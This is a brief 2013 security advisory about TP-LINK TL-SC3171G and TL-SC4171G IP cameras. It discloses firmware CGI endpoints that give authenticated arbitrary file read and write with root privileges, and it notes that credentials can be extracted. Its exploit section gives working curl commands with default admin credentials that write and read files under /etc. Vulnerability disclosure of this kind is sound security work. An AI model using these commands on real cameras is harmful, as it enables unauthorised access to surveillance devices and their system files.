================================================ == Alex Stanev Security Advisory #5 @16.03.2013 == == http://sec.stanev.org == ================================================ PRODUCT TP-LINK IP camera [TL-SC3171G/TL-SC4171G] VENDOR TP-LINK [http://www.tp-link.com] VERSIONS AFFECTED 1.6.18P7_111209 for model TL-SC3171G 1.6.18P7_111209 for model TL-SC4171G CLASS Post auth remote arbitrary file read and write with root privileges PRODUCT DESCRIPTION TL-SC3171G is wireless day/night surveillance IP camera. TL-SC4171G includes motorized pan/tilt feature. Both cameras are Linux powered ARM devices. THE PROBLEM Firmware exposes "fileread" and "filewrite" CGI applications, allowing read and write arbitrary files. It is also possible to extract all user credentials via configuration interface with base64 encoded passwords. EXPLOIT 1) Remote file write $curl -u "admin:admin" "http://[IP]/cgi-bin/admin/filewrite?SAVE.filePath=/etc/a&SAVE.fileData=Test" 2) Remote file read $curl -u "admin:admin" "http://[IP]/cgi-bin/admin/fileread?READ.filePath=/etc/a" Test PATCH/WORKAROUND No workaround possible. Next version? VENDOR STATUS NOT informed. Backdoor. ========================= == EOF == == http://sec.stanev.org == =========================